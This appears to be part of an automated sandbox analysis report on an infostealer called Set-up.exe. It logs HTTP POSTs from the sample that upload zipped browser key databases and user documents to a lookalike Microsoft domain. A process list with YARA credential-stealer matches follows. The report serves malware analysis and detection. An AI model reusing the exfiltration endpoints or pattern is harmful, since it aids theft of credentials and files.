                                                    May 10, 2025 08:05:48.659563065 CEST28723OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.011706114 CEST711INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:48 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoOGlGGqPfEQFfPtqMJO%2FVw6j7Iq6CZexNOlvmMTVObLtZqYnLxDblq4XS1JweUuRrvb8xnZkZQzkXnDx3H4auo4PtAxwG0Ae8qI%2FLgh%2B6DP1CAe%2B6%2BLzf4ApWEEvkco2RWM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f38ed580111-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141143&min_rtt=141143&rtt_var=70571&sent=73&recv=106&lost=0&retrans=0&sent_bytes=0&recv_bytes=140079&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449731188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:49.286974907 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 524954
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
                                                    May 10, 2025 08:05:49.428000927 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.428132057 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.428175926 CEST8148OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.428301096 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.428339958 CEST8148OUTData Raw: 35 35 2c 20 61 63 65 35 33 34 33 35 36 2c 20 61 63 65 35 33 34 33 35 37 2c 20 61 63 65 35 33 34 33 35 38 2c 20 61 63 65 35 33 34 33 36 34 2c 20 61 63 65 35 33 34 33 36 35 2c 20 61 63 65 35 33 34 33 36 36 2c 20 61 63 65 35 33 34 33 36 37 2c 20 61
                                                    Data Ascii: 55, ace534356, ace534357, ace534358, ace534364, ace534365, ace534366, ace534367, ace534368, ace534369, ace534373, ace534374, ace536351, ace536352, ace536353, ace536354, ace536355, ace536356, ace536357, ace536358, ace536359, ace53635a, ace53635
                                                    May 10, 2025 08:05:49.569861889 CEST31234OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.569909096 CEST17654OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.569991112 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.712431908 CEST63826OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:49.712639093 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:50.852917910 CEST706INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:50 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaYLvIvT4F8G1gbU1VSwh4vg1pLlkVS4pn8XjuV%2B2ci81ULVmk9L7izkzK5xknweEA3FRolja504yAZ5aIbMaKNWjBg0prMQcYDCow1cideQw64LWM1MhptPadgG2Z%2FwQ3v9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f3f8d4142d9-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141076&min_rtt=141076&rtt_var=70538&sent=246&recv=390&lost=0&retrans=0&sent_bytes=0&recv_bytes=525084&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449732188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:51.524108887 CEST13580OUTPOST /Up/g HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 14506
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 6c 05 f3 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 fa 9e d0 02 04 00 00 02 04 00 00 32 00 00 00 67 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 41 46 57 41 41 46 52 58 4b 4f 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 41 46 57 41 41 46 52 58 4b 4f 49 4d 59 55 54 45 42 4b 4c 43 46 59 55 53 4d 50 4b 42 4c 4c 56 4c 59 43 5a 53 42 59 51 41 52 52 42 49 44 4e 4d 59 4c 50 4c 47 41 49 4a 59 42 50 58 5a 52 52 43 44 4b 57 55 4a 43 5a 46 4e 5a 59 57 4a 4c 4a 57 43 50 50 4e 57 4e 42 55 4e 55 4b 57 4b 41 4e 41 46 4a 54 47 53 4d 4e 44 4e 41 49 50 57 59 43 43 55 47 5a 54 57 43 58 49 44 55 48 4c 4b 44 49 49 46 58 56 5a 5a 43 42 4b 54 4b 5a 58 4b [TRUNCATED]
                                                    Data Ascii: PK\d!Rl00(f1575b64-8492-4e8b-b102-4d26e8c70371.txt1746857132929e146be9-c76a-4720-bcdb-53011b87bd06PK\d!R2g/Users/user/Documents/AFWAAFRXKO/AFWAAFRXKO.docxAFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZN [TRUNCATED]
                                                    May 10, 2025 08:05:51.665410995 CEST1055OUTData Raw: 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 41 46 57 41 41 46 52 58 4b 4f 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 95 fa 9e d0 02 04 00 00 02 04 00 00 27 00 00 00 00
                                                    Data Ascii: /Users/user/Documents/AFWAAFRXKO/AFWAAFRXKO.docxPK\d!R'g/Users/user/Documents/AFWAAFRXKO.docxPK\d!R2g/Users/user/Documents/MNULNCRIYC/MNULNCRIYC.docxPK\
                                                    May 10, 2025 08:05:51.971762896 CEST702INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:51 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7asmikCpMWLXommg91BH9wnjhHwysiFaQjIQpJ0VpFQyn7OYySTTYG%2Fe3FbeDUIsJQvEJxLjdtaDNuUuqQ5tZ07aFEQdP0nJW8yh4zAuCZvqIO5rpBjfFJ7t7zW%2Bv9OzQII"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f4d7ee87867-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141355&min_rtt=141355&rtt_var=70677&sent=5&recv=13&lost=0&retrans=0&sent_bytes=0&recv_bytes=14635&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:02:05:20
                                                    Start date:10/05/2025
                                                    Path:C:\Users\user\Desktop\Set-up.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                    Imagebase:0x400000
                                                    File size:25'181'696 bytes
                                                    MD5 hash:93704DCB189997351EC039C6E5F1AA41
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1236851204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:02:05:35
                                                    Start date:10/05/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                    Imagebase:0x7ff786830000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:02:05:36
                                                    Start date:10/05/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                    Imagebase:0x7ff786830000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:02:05:36
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7260 -s 144
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:02:05:37
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7260 -s 92
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:02:05:41
                                                    Start date:10/05/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                    Imagebase:0x7ff786830000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:02:05:41
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3888 -s 144
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:02:05:41
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3888 -s 92
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:02:05:46
                                                    Start date:10/05/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                    Imagebase:0x7ff786830000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:02:05:46
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 1692 -s 140
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:02:05:46
                                                    Start date:10/05/2025
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 1692 -s 92
                                                    Imagebase:0x7ff7d2470000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Reset < >